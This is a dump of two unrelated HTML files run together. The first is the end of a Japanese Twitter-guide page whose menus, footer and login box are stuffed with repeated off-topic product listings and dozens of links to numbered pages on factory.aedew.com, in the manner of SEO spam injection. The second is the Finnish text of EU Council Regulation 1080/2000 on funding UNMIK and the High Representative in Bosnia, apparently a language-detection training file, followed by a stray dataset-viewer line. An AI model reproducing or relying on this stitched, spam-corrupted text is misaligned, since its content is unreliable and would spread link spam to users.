<li><a href="http://twinavi.jp/matome/category/%E9%9F%B3%E6%A5%BD">音楽</a></li>
<li><a href="">BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
</a></li>
<li><a href="">社会</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021838147ph.html">http://factory.aedew.com/images/Chershire/02021838147ph.html</a></li>
</ul>
<br class="block clearfix"><br>
</li>
<li class="sitemap-block">
<span class="top-sitemap"><a href="http://factory.aedew.com/images/Chershire/02021849145vg.html">http://factory.aedew.com/images/Chershire/02021849145vg.html</a></span>
<ul>
<li><a href="">インタビュー 一覧</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-account">Twitter</a></span>
<ul>
<li><a href="./index.html">総合</a></li>
<li><a href="http://twinavi.jp/account/list/%E6%9C%89%E5%90%8D%E4%BA%BA%E3%83%BB%E8%8A%B8%E8%83%BD%E4%BA%BA">有名人・芸能人</a></li>
<li><a href="">エンタメ</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021716723lw.html">http://factory.aedew.com/images/Chershire/02021716723lw.html</a></li>
<li><a href="">メディア</a></li>
<li><a href="http://twinavi.jp/account/list/%E3%83%93%E3%82%B8%E3%83%8D%E3%82%B9%E3%83%BB%E7%B5%8C%E6%B8%88">ビジネス・経済</a></li>
<li><a href="">BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
</a></li>
<li><a href="">スポーツ</a></li>
<li><a href="">サービス</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021752070te.html">http://factory.aedew.com/images/Chershire/02021752070te.html</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-topics">特別企画</a></span>
<ul>
<li class="clearfix"><a href="">アンケート</a></li>
<li><a href="">選挙</a></li>
</ul>
</li>
<li class="sitemap-block"><span class="top-sitemap"><a href="" class="servicename ti-guide">Twitter使い方ガイド</a></span>
<ul>
<li><a href="http://factory.aedew.com/images/Chershire/02021930246qx.html">http://factory.aedew.com/images/Chershire/02021930246qx.html</a></li>
<li><a href="">Twitterとは</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021802281pb.html">http://factory.aedew.com/images/Chershire/02021802281pb.html</a></li>
<li><a href="">BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
</a></li>
<li><a href="">よくある質問</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021729170am.html">http://factory.aedew.com/images/Chershire/02021729170am.html</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-twitter">ツイッター検索</a></span>
<ul>
<li><a href="">キーワード検索</a></li>
<li><a href="">ユーザー会話検索</a></li>
</ul>
<br class="block clearfix"><br>
<span class="top-sitemap"><a href="" class="servicename ti-help">ツイナビヘルプ</a></span>
<ul>
<li><a href="http://factory.aedew.com/images/Chershire/02021706031gw.html">http://factory.aedew.com/images/Chershire/02021706031gw.html</a></li>
<li><a href="">よくある質問</a></li>
</ul>
</li>
</ul>
</nav>
<div class="clearfix"></div>
</div>
<div id="footer-giftext">
<div class="contents">
<!-- giftext -->
<div class="column footer-giftext">
<div class="column">
<a href="http://factory.aedew.com/images/Chershire/02021738009xj.html">http://factory.aedew.com/images/Chershire/02021738009xj.html</a>
</div>
<div class="giftext icon-m">
<span class="subtitle">ツイナビ公式Twitter</span>
<a href="" class="twitter-follow-button" data-show-count="false" data-lang="ja" data-show-screen-name="false">1/43 日産 プレジデント(JHG50) フェンダーミラー ブラック[MARK43]《08月予約》</a>
</div>
</div>
<div class="column footer-giftext">
<div class="column">
<a href="https://www.facebook.com/" target="_blank" class="altimg icon m ic-facebook">facebook</a>
</div>
<div class="giftext icon-m">
<span class="subtitle">ツイナビ公式Facebook</span>
<div id="fb-root"></div><div class="fb-like" data-href="https://www.facebook.com/" data-send="false" data-layout="button_count" data-width="200" data-show-faces="false">BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
</div>
</div>
</div>
<div class="column footer-giftext twinavismart">
<div class="column">
<a href="" class="altimg icon m ic-twinavismart">ツイナビforスマートフォン</a>
</div>
<div class="giftext icon-m">
<span class="subtitle"><a href="">ツイナビforスマートフォン</a></span>
<span class="xsmall"><a href="">スマートフォンでアクセス!</a></span>
</div>
</div>
<!-- //giftext -->
<div class="clearfix"></div>
</div>
</div>
<div class="contents last">
<ul id="docs" class="centered xsmall">
<li><a href="">ツイナビ ホーム</a></li>
<li><a href="">利用規約</a></li>
<li><a href="http://www.garage.co.jp/corporate/policy/index.html" target="_blank">個人情報保護方針</a></li>
<li><a href="">健全化に関する指針</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021852718ny.html">http://factory.aedew.com/images/Chershire/02021852718ny.html</a></li>
<li><a href="http://factory.aedew.com/images/Chershire/02021720796ln.html">http://factory.aedew.com/images/Chershire/02021720796ln.html</a></li>
<li><a href="">広告掲載について</a></li>
<li class="last"><a href="">お問い合わせ</a>
</ul>
<p class="centered xsmall"><small>Copyright © 2016 All rights reserved.</small></p>
</div>
</footer>
<div class="hide">
<div id="preregister-box">
<p class="preregister-title large">BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
</p>
<p class="preregister-text">1/43 日産 プレジデント(JHG50) ホワイトパール[MARK43]《08月予約※暫定》<br/>1/43 日産 プレジデント(JHG50) ダークブルーイッシュブラックパール[MARK43]《08月予約》,BD 魔弾の王と戦姫 (ヴァナディース) 第4巻 (Blu-ray Disc)[ショウゲート]
</p>
<p><a href="" class="btn login preregister-login">Twitterでの認証に進む</a></p>
</div>
</div>
</body>
</html>
|
src/main/resources/naacl2010-langid/EuroGOV/trn0009.html | varh1i/language_detection | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="DC.type" http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<head>Neuvoston asetus (EY) N:o 1080/2000, annettu 22 päivänä toukokuuta 2000, Yhdistyneiden Kansakuntien väliaikaisen Kosovon-siviilioperaation (UNMIK) sekä Bosnia ja Hertsegovinassa olevan korkean edustajan toimiston tukemisesta</head>
<div type="body">
<p>Neuvoston asetus (EY) N:o 1080/2000,</p>
<p>annettu 22 päivänä toukokuuta 2000,</p>
<p>Yhdistyneiden Kansakuntien väliaikaisen Kosovon-siviilioperaation (UNMIK) sekä Bosnia ja Hertsegovinassa olevan korkean edustajan toimiston tukemisesta</p>
<p>EUROOPAN UNIONIN NEUVOSTO, joka</p>
<p>ottaa huomioon Euroopan yhteisön perustamissopimuksen ja erityisesti sen 308 artiklan,</p>
<p>ottaa huomioon komission ehdotuksen,</p>
<p>ottaa huomioon Euroopan parlamentin lausunnon(1),</p>
<p>sekä katsoo seuraavaa:</p>
<p>(1) Yhteisö noudattaa aktiivista jälleenrakentamisen, pakolaisten ja kotiseudultaan siirtymään joutuneiden henkilöiden paluun avustamisen sekä taloudellisen ja alueellisen yhteistyön politiikkaa Kosovossa sekä Bosnia ja Hertsegovinassa, missä kansainvälinen yhteisö on luonut toimintoja siirtymävaiheen siviilihallinnon varmistamiseksi ja rauhansopimusten täytäntöönpanemiseksi. Nämä toiminnot ovat Yhdistyneiden Kansakuntien väliaikainen Kosovon-siviilioperaatio (UNMIK) sekä Bosnia ja Hertsegovinassa olevan korkean edustajan toimisto.</p>
<p>(2) Näiden toimintojen luominen ajoissa sekä niiden säännöllinen toiminta voivat olla merkittäviä tekijöitä tähän politiikkaan liittyvän yhteisön avun mahdollisimman suuren tehokkuuden kannalta.</p>
<p>(3) Olisi siten säädettävä oikeudellisesta kehyksestä, joka kattaa näille kahdelle toiminnalle annettavan yhteisön taloudellisen avun.</p>
<p>(4) Tässä asetuksessa tarkoitetut toimet kuuluvat yhteisön Kosovossa sekä Bosnia ja Hersegovinassa harjoittamaan politiikkaan ja ne ovat tarpeellisia yhteisön tavoitteen saavuttamiseksi. Perustamissopimuksessa ei ole muuta tämän asetuksen antamiseen valtuuttavaa määräystä kuin 308 artikla,</p>
<p>ON ANTANUT TÄMÄN ASETUKSEN:</p>
<p>1 artikla</p>
<p>1. Kosovossa sekä Bosnia ja Hersegovinassa harjoittamansa jälleenrakentamisen, pakolaisten ja kotiseudultaan siirtymään joutuneiden henkilöiden paluun avustamisen sekä taloudellisen ja alueellisen yhteistyön politiikkansa mukaisesti yhteisö osallistuu UNIMIKin (neljäs pilari) ja korkean edustajan toimiston perustamisen ja toiminnan rahoittamiseen.</p>
<p>2. Rahoitus tapahtuu UNMIKin ja korkean edustajan toimiston talousarvioille annettavan tuen muodossa.</p>
<p>2 artikla</p>
<p>1. Komissio toteuttaa tässä asetuksessa tarkoitetut toimet.</p>
<p>2. Tuen määrä, hyväksyttävät kustannukset, tukiajanjakso sekä täytäntöönpanoa, valvontaa ja hallintoa koskevat yksityiskohtaiset säännöt samoin kuin Euroopan yhteisön tuen lopullinen kohde määritellään Euroopan yhteisön puolesta toimivan komission ja edunsaajatoimintojen välillä tehtävissä rahoitussopimuksissa.</p>
<p>Näissä rahoitussopimuksissa pyritään varmistamaan vastuun jakautuminen tasaisesti Euroopan unionin ja muiden kansainvälisen yhteisön toimijoiden välillä.</p>
<p>3 artikla</p>
<p>Komissio valvoo tämän asetuksen täytäntöönpanoa ja raportoi asiasta säännöllisesti Euroopan parlamentille ja neuvostolle.</p>
<p>4 artikla</p>
<p>Rahoitussopimuksissa sekä niistä johtuvissa täytäntöönpanosopimuksissa tai -asiakirjoissa on nimenomaisesti määrättävä siitä, että komissio, sen valtuuttamat elimet, tilintarkastustuomioistuin ja Euroopan petostentorjuntavirasto (OLAF) voivat tarvittaessa tehdä paikalla suoritettavan tarkastuksen.</p>
<p>5 artikla</p>
<p>Tämä asetus tulee voimaan sitä päivää seuraavana päivänä, jona se julkaistaan Euroopan yhteisöjen virallisessa lehdessä.</p>
<p>Tämä asetus on kaikilta osiltaan velvoittava, ja sitä sovelletaan sellaisenaan kaikissa jäsenvaltioissa.</p>
</div>
<div type="signature">
<p>Tehty Brysselissä 22 päivänä toukokuuta 2000.</p>
<p>Neuvoston puolesta</p>
<p>Puheenjohtaja</p>
<p>J. Gama</p>
<p>(1) Lausunto annettu 4. toukokuuta 2000 (ei vielä julkaistu virallisessa lehdessä).</p>
</div>
</body>
</html>
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.